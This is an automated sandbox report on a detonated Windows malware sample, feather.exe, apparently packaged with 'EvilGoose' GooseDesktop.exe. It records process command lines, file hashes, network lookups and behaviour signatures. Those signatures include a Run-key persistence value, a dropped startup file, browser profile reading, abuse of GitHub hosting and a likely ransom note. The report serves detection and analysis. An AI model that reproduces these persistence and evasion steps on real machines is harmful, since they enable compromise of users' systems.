| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.43.201.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-11 17:49
Reported
2024-06-11 17:55
Platform
win7-20240508-en
Max time kernel
118s
Max time network
120s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2796 -s 220
Network
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-06-11 17:49
Reported
2024-06-11 17:55
Platform
win7-20240221-en
Max time kernel
122s
Max time network
126s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1816 -s 220
Network
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-06-11 17:49
Reported
2024-06-11 17:55
Platform
win10v2004-20240426-en
Max time kernel
90s
Max time network
94s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1928 wrote to memory of 4276 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1928 wrote to memory of 4276 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1928 wrote to memory of 4276 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4276 -ip 4276
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4276 -s 612
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-06-11 17:49
Reported
2024-06-11 17:55
Platform
win10v2004-20240508-en
Max time kernel
145s
Max time network
157s
Command Line
Signatures
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\LICENSES.chromium.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff858fa46f8,0x7ff858fa4708,0x7ff858fa4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3372 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3372 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4496 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4492 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,8303605764155548985,13533865545703081220,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1440 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 439b5e04ca18c7fb02cf406e6eb24167 |
| SHA1 | e0c5bb6216903934726e3570b7d63295b9d28987 |
| SHA256 | 247d0658695a1eb44924a32363906e37e9864ba742fe35362a71f3a520ad2654 |
| SHA512 | d0241e397060eebd4535197de4f1ae925aa88ae413a3a9ded6e856b356c4324dfd45dddfef9a536f04e4a258e8fe5dc1586d92d1d56b649f75ded8eddeb1f3e2 |
\??\pipe\LOCAL\crashpad_1952_HCZBFPHWHOKWPETG
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | a8e767fd33edd97d306efb6905f93252 |
| SHA1 | a6f80ace2b57599f64b0ae3c7381f34e9456f9d3 |
| SHA256 | c8077a9fc79e2691ef321d556c4ce9933ca0570f2bbaa32fa32999dfd5f908bb |
| SHA512 | 07b748582fe222795bce74919aa06e9a09025c14493edb6f3b1f112d9a97ac2225fe0904cac9adf2a62c98c42f7877076e409803014f0afd395f4cc8be207241 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 8567316010903a6a90b08458e30b6f82 |
| SHA1 | daf7d1d6c33f11198c2f55ba449d261c42c2a7da |
| SHA256 | 15e599233344ddd6f659ce83fb12ea673b2df6c9df50c4a5f05c7c1c3f85de49 |
| SHA512 | 2a397ec18e7109f25e49af778cf1ba3d3114eedae1b39b9bd362730ead6ea26a7ed2832cffbf3bf0fee697e57388baabc07706f1c1d2f381e38e1bf2b961b465 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 7198bdb3f2519408508c6f6bf6578450 |
| SHA1 | a58db09182f85c8ae3302050899225f0f8d377b2 |
| SHA256 | f740d32ecf9ab22961357e5ffac17f9a68aa17cd70511cf00b4c4ff644940173 |
| SHA512 | 624864b99e6e5ac6a23f74c549efb606655cefd38e15d037757df2de682157c92654901afd07bf10c8a0a2dc7eeef92124f4ae57ec4d69820f1a8d71aea2691e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | af6c6a59e4c1015a1fb53baf63c675e2 |
| SHA1 | 1f0cc03c5ec93676774097faabb1250b3265524a |
| SHA256 | 84ba92ab71200b1c85cdd263ab99bdd20444110ac57bdf40a6bb17eb12bb7b47 |
| SHA512 | fb45a2ee791888b7d2c2a065727c91e26c70749cf9b96d350c9749cf5d08486c2e2358b92c969ed6f1546e9af68b09c984f7593ccefe6e088d573f137a4dc1ca |
Analysis: behavioral10
Detonation Overview
Submitted
2024-06-11 17:49
Reported
2024-06-11 17:55
Platform
win7-20240508-en
Max time kernel
121s
Max time network
133s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\feather.exe
"C:\Users\Admin\AppData\Local\Temp\feather.exe"
Network
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-06-11 17:49
Reported
2024-06-11 18:10
Platform
win10v2004-20240426-en
Max time kernel
843s
Max time network
454s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Disables Task Manager via registry modification
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\feather.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\feather.exe | C:\Users\Admin\AppData\Local\Temp\feather.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\feather.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\feather.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\feather.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDriverSetupqfB3Eu = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\feather.exe" | C:\Windows\system32\reg.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs | C:\Windows\System32\svchost.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | C:\Users\Admin\AppData\Local\Temp\feather.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\feather.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 | C:\Users\Admin\AppData\Local\Temp\feather.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\feather.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\AppData\Local\Temp\feather.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\feather.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Users\Admin\AppData\Local\Temp\feather.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Windows\system32\mspaint.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Windows\system32\mspaint.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\notepad.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\feather.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\feather.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
